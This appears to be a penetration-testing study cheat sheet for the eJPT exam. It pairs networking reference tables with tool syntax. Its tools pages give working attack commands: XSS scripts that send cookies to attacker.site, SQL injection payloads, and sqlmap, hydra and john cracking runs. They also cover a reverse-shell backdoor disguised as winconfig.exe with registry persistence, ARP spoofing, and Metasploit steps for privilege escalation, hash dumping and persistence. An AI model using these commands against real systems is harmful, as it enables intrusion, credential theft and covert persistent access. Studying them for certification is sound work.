INDEX

Linux Comands
Network Mask Information
Standard Ports
Web Header Information
Err:504
Word Lists
Locations
Server
Description
Basic linux commands that should be known to get around the OS and work with files and software
Network addressing information
Small list of well known ports
Web header formatting and syntax. Good for working with burp suite
Software used in the eJPT along with basic syntax for the commands to execute
Word list locations
Just a few locations of files of interest
Syntax to run a simple http server not used in eJPT
 LinuxCmds

Index

ifconfig network configuration ip address

route route -n (for gateway) routing and gateway
ip route routing
ip neighbor arp
ping check alive
cp copy
rm remove delete
mkdir create directory
cat read
nano text editor
traceroute trace connection
ls list contents of folder
chmod Chmod 777 change permissions
mv move
file check file type
whoami active user
pwd current working directory
rmdir delete directory
netstat netstat -tunp check listening ports and connections
wc -m count length of file
WHOIS
nslookup
arp
uname -a
ssh ssh [email protected]
telnet telnet [email protected]

Page 3
 NetMask

Index

slash notation net mask hex binary representation

/0 0.0.0.0 0x00000000 00000000 00000000 00000000 00000000
/1 128.0.0.0 0x80000000 10000000 00000000 00000000 00000000
/2 192.0.0.0 0xc0000000 11000000 00000000 00000000 00000000
/3 224.0.0.0 0xe0000000 11100000 00000000 00000000 00000000
/4 240.0.0.0 0xf0000000 11110000 00000000 00000000 00000000
/5 248.0.0.0 0xf8000000 11111000 00000000 00000000 00000000
/6 252.0.0.0 0xfc000000 11111100 00000000 00000000 00000000
/7 254.0.0.0 0xfe000000 11111110 00000000 00000000 00000000
/8 255.0.0.0 0xff000000 11111111 00000000 00000000 00000000
/9 255.128.0.0 0xff800000 11111111 10000000 00000000 00000000
/10 255.192.0.0 0xffc00000 11111111 11000000 00000000 00000000
/11 255.224.0.0 0xffe00000 11111111 11100000 00000000 00000000
/12 255.240.0.0 0xfff00000 11111111 11110000 00000000 00000000
/13 255.248.0.0 0xfff80000 11111111 11111000 00000000 00000000
/14 255.252.0.0 0xfffc0000 11111111 11111100 00000000 00000000
/15 255.254.0.0 0xfffe0000 11111111 11111110 00000000 00000000
/16 255.255.0.0 0xffff0000 11111111 11111111 00000000 00000000
/17 255.255.128.0 0xffff8000 11111111 11111111 10000000 00000000
/18 255.255.192.0 0xffffc000 11111111 11111111 11000000 00000000
/19 255.255.224.0 0xffffe000 11111111 11111111 11100000 00000000
/20 255.255.240.0 0xfffff000 11111111 11111111 11110000 00000000
/21 255.255.248.0 0xfffff800 11111111 11111111 11111000 00000000
/22 255.255.252.0 0xfffffc00 11111111 11111111 11111100 00000000
/23 255.255.254.0 0xfffffe00 11111111 11111111 11111110 00000000
/24 255.255.255.0 0xffffff00 11111111 11111111 11111111 00000000
/25 255.255.255.128 0xffffff80 11111111 11111111 11111111 10000000
/26 255.255.255.192 0xffffffc0 11111111 11111111 11111111 11000000
/27 255.255.255.224 0xffffffe0 11111111 11111111 11111111 11100000
/28 255.255.255.240 0xfffffff0 11111111 11111111 11111111 11110000
/29 255.255.255.248 0xfffffff8 11111111 11111111 11111111 11111000
/30 255.255.255.252 0xfffffffc 11111111 11111111 11111111 11111100
/31 255.255.255.254 0xfffffffe 11111111 11111111 11111111 11111110
/32 255.255.255.255 0xffffffff 11111111 11111111 11111111 11111111

Page 4
 NetMask

number of hosts
4294967296
2147483648
1073741824
536870912
268435456
134217728
67108864
33554432
16777216
8388608
4194304
2097152
1048576
524288
262144
131072
65536
32768
16384
8192
4096
2048
1024
512
256
128
64
32
16
8
4
2
1

Page 5
 NetMask

2,147,483,646
1,073,741,822
536,870,910
268,435,454
134,217,726
67,108,862
33,554,430
16,777,214
8,388,606
4,194,302
2,097,150
1,048,574
524,286
262,142
131,070
65,534
32,766
16,382
8,190
4,094
2,046
1,022
510
254
126
62
30
14
6
2
0
1

Page 6
 Standard Ports

Index

22 SSH
25 SMTP
110 POP3
115 SFTP
143 IMAP
80 HTTP
443 HTTPS
23 TELNET
21 FTP
3389 RDP
3306 MYSQL
1433 MS SQL
137 NETBIOS find work groups
138 NETBIOS list shares & machines
139 NETBIOS transit data
53 DNS

Page 7
 webHeader

Index

Methods
GET
POST
TRACE
HEAD
OPTIONS
DELETE
PUT

GET / HTTP/1.1
host: www.site.com

POST /login.php HTTP/1.1

host: www.site.com
username=john&password=mypass

PUT /path/to/destination HTTP/1.1

host: www.site.com
<put data>

DELETE /path/to/destination HTTP/1.1

host: www.site.com

OPTIONS / HTTP/1.1
host: www.site.com

to exploit a PUT method you need to know the size of the file you are sending. Use unix utility wc with -m paramter
wc -m payload.php
nc victim.site 80
PUT /payload.php HTTP1.1
host: victim.site
Content-type: text/html
Content-length: <wc output>

Page 8
 webHeader

4.3.8.4 PHP example

Page 9
 webHeader

add data to send on line after host:

add data to send on line after host:

Page 10
 tools

Index

WireShark

firebug

netcat

openssl

burp suite

fping

Page 11
 tools

nmap

Nessus

dirbuster

XSS

Page 12
 tools

SQLi

SQLMAP

ncat

Page 13
 tools

john the ripper

ophrack

hydra

Page 14
 tools

nbtstat

NET VIEW

nmblookup

smbclient

NET USE

enum4linux

Page 15
 tools

samrdump.py

dsniff
arpspoof

metasploit

Page 16
 tools

meterpreter
I

Page 17
 tools

follow tcp stream

File > export objects > smb/smb2 > save as
View > name resolution > resolve physical addresses
!arp and !http
http.request.method == GET
check arp requests for candidate router. Verify by looking at candidate router ip TCP traffic to see if it communicates on different networks
tcp.stream eq 1

plugin for firefox to present session data

command line connect to web page

nc -h
nc -v www.ferrari.com 80
GET / HTTP/1.0
GET / HTTP/1.1
host: www.ferrari.com

command line connect to secure web page

openssl s_client args
openssl s_client -connect hack.me:443

openssl s_client -connect hack.me:443 -quiet

GET / HTTP/1.1
host: hack.me

Burp > restore defaults > all options

check to turn on intercept responses
repeater
proxy
target
spider

use nmap instead

fping -a -g 192.168.1.0/24 2> /dev/null
-a
-g

Page 18
 tools

2> /dev/null

scan network
nmap -sn 192.168.1.0/24
-sn
-iL
-A
-O
-sV
-sS
-iL
-Pn
--osscan-limit
--osscan-guess
-sT
-v
-p
nmap -script=smb-enum-shares 192.168.102.151
nmap -script=smb-enum-users 192.168.102.151
nmap -script=smb-brute 192.168.102.151
nmap –script=smb-check-vulns <ip address>

scans for vulnerabilities

injecting content onto a web page

request headers
cookies
form inputs
post parameter
get parameter
test with <i>, <pre>, <plaintext>
<script>alert(‘XSS’)</script>
<script>alert(document.cookie)</script>

<script>
var i = new image();

Page 19
 tools

i.src=”http://attacker.site/log.php?q=”+document.cookie;
</script>
need attacker site to receive the cookie and then change cookie in your session

inject sql language to retrieve data

' OR 1=1; – -
' OR ‘a’=’a’; – -
' OR ‘a’=’b’; – -
this returns a true or false or may get you past authentication
' OR substr(user(),1,1)=’a
if returns true then the first letter is a and move to next
' UNION SELECT null; – -
' UNION SELECT null,null; – -
this lets you know how many fields original query is trying to retrieve
'UNION SELECT ‘id1’, ‘id2’; – -
if returning fields, this will let you know which one is being returned
'UNION SELECT user(), ‘id2’; – -

tool to exploit SQLi

sqlmap -u <url> -p <injection parameter> [options]
Sqlmap -u ‘http://victim.site/view.php?id=1141’ -p id –technique U
attack id parameter with UNION SQLi technique
sqlmap -u <url> --data=<POST string> -p <parameter> [options]
to exploit POST parameter
copy the post string from burp
sqlmap -u http://10.124.211.96/login.php --data='username=a&password=b&submit=Login' -p username --level=2 -D awd -T accounts -C displayname,email,id,pass
-b to get banner
-v3 --fresh-queries
--users
--dbs

improved netcat
set to listen on windows machine and make command line available
rename ncat to winconfig.exe
winconfig -l -p 5555 -e cmd.exe
-l listen mode
-p listen on port
-e execute (cmd.exe)
then connect from ncat on another machine
ncat <ip address> <port>

Page 20
 tools

reverse connection
put attacker machine in listen mode
ncat -l -p 5555 -v
-v verbose
from victim machine
winconfig -e cmd.exe <attacker ip> <port>

to make persistant backdoor add registry settings

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
new string value
winconfig “c:\windows\system32\winconfig.exe” <ip address> <port> -e cmd.exe

password cracker, brute force and dictionary

unshadow passwd shadow > crackme
john –list=formats
/etc/passwd
/etc/shadow
unshadow passwd shadow > crackme
john -incremental -users:<userlist> <file to crack>
john -incremental -users:victim crackme
john –show crackme
john -wordlist<=custom wordlist file> <file to crack>
-rules for mangling
john -wordlist=mywordlist -users:victim crackme
john -wordlist=mywordlist -rules -users:victim crackme
john -wordlist=/usr/share/john/password.lst
cat /root/.john/john.pot
john –show hashes

cracker for windows auth passwords

load password file
install rainbow tables from ophrack site
click crack

fast, parallelized, network auth cracker

hydra -U rdp
-U to get info about a specific module
hydra -L users.txt -P pass.txt <service://server> <options>
hydra -U http-post-form

Page 21
 tools

hydra crackme.site http-post-form “/login/php:usr=^USER^&pwd=^PASS^:invalid credentials” -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/roc

'invalid credentials’ is the returned string when login fails
-L /usr/share/ncrack/minimal.usr
-P /usr/share/seclists/Passwords/rockyou-15.txt
-f stop after first success
-v verbose
hydra -U ssh
Hydra 192.168.102.143 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -v

display info about target

nbtstat -A <ip address>
<00> workstation
<20> file sharing is up

enumerate shares
net view <target ip>

display info about target (linux version of nbtstat)

nmblookup -A <target ip>

Ftp-like client to access windows shares

smbclient -L //192.168.1.10 -N
-L to look at what services
//<ip address> requires //
-N forces the tool to not ask for a password
smbclient //<target ip>/IPC$ -N
smbclient //<ip address> -N
dir
get file.txt /root/Desktop

test from windows shell for null session

NET USE \\<target ip>\IPC$ ‘’/u:’’
'’/u:’’ connect with empty username and password
test only works with IPC$

automated tools for null session attack

nmap -sS -p 135,139,445 192.168.102.0/24
enum4linux
enum4linux -n 192.168.102.151

Page 22
 tools

look for <20> flag for sharing

enum4linux -P 192.168.102.151
look for password policy
enum4linux -S 192.168.102.151
enumerate shares
enum4linux -s /usr/share/enum4linux/share-list.txt 192.168.102.151
brute force share finder
enum4linux -a 192.168.102.151
run all commands

cd /usr/share/doc/python-impacket-doc/examples
python samrdump.py 192.168.102.151

collection of tools for network auditing

one utility designed to intercept traffice
Echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target> -r <host>
interface is the nic
run wireshark
Ctrl-c to stop

msfconsole
show -h
search <my search term>
show exploits
use exploit/windows/ftp/turboftp_port
back
use exploit/windows/ftp/turboftp_port
show options
set RHOST <ip address>
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set LHOST <ip address>
exploit

msfupdate

Page 23
 tools

ifconfig
sysinfo
background
sessions -l
session -i <session id>
route
getuid
getsystem
background
search bypassuac
use exploit/windows/local/bypassuac
show options
set session 1
exploit
getsystem
hashdump
background
use post/windows/gather/hashdump
show options
set session 2
exploit
pwd
cd
ls
download haxlogs.log /root/
upload /root/backdoor.exe c:\\windows
shell
dir
exit
help
ps
getpid
sysinfo
pwd
ls
cd
cat
download
getsystem

Page 24
 tools

run post/windows/gather/win_privs
getuid
background
search uac
use exploit/windows/ftp/turboftp_port
show options
set session 1
exploit
getsystem
ps -U
Migrate 616
hashdump

s4u_persistance
use exploit/windows/local/s4u_persistance
show options
set session 1
set trigger logon
set payload windows/meterpreter/reverse_tcp
set LHOST <ip address>
set lport <port>
show options
exploit
create listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <ip address>
set lport <port>
exploit

Page 25
 tools

DOES NOT WORK WITH SSL

help
open connection to web page
once connection is opened send http command and then make two blanks lines after

using http/1.1 you must also put a host line and then put two blank lines

-debug evaluate ssl cert

-state state of the handshake

use two blank lines afterwards

shows only alive

ping sweep instead of standard ping

Page 26
 tools

suppresses uneeded output

ping scan disable port scan

enable all scans (OS, version, script, traceroute)

OS detection
port scan with -sS as default
SYN scan (Stealth)
import list of hosts
skip ping, treat all hosts as online
limit os detection to promising targets
guess OS more aggressively
tcp connect scan (not stealthy)
increase verbose level
specify ports to scan

nmap –script=vuln <ip address>

<script> var i = new Image(); i.src=”http://attacker.site/get.php?cookie=”+escape(document.cookie)</script>

Page 27
 tools

to get what string sqlmap used to exploit

Page 28
 tools

lists hashes with cracked passwords

shows cracked accounts from the unshadowed hashes file

Page 29
 tools

windows

linux tool installed with samba

can enumerate shares including admin shares

Page 30
 tools

arp spoofing
turns linux box into router to relay traffic

to back out

Page 31
 wordlists

Index

password lists

seclists /usr/share/seclists/Passwords Apt-get install seclists

/usr/share/seclists/Passwords/rockyou-10.txt
/usr/share/seclists/Passwords/rockyou-15.txt

dirbuster /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
/usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt

john /usr/share/john/password.lst

hydra/ncrack /usr/share/ncrack/minimal.usr

Page 32
 locations

Index

/etc/network/interfaces add static ip address

/bin/bash command interpreter bash shell
/etc/crontab list of scheduled jobs

Page 33
 Server

Index

HTTP
go to folder you want give access
python -m SimpleHTTPServer 80
then you can get the files from there
curl <ip address>/file.py -o <desitnation file name>

Page 34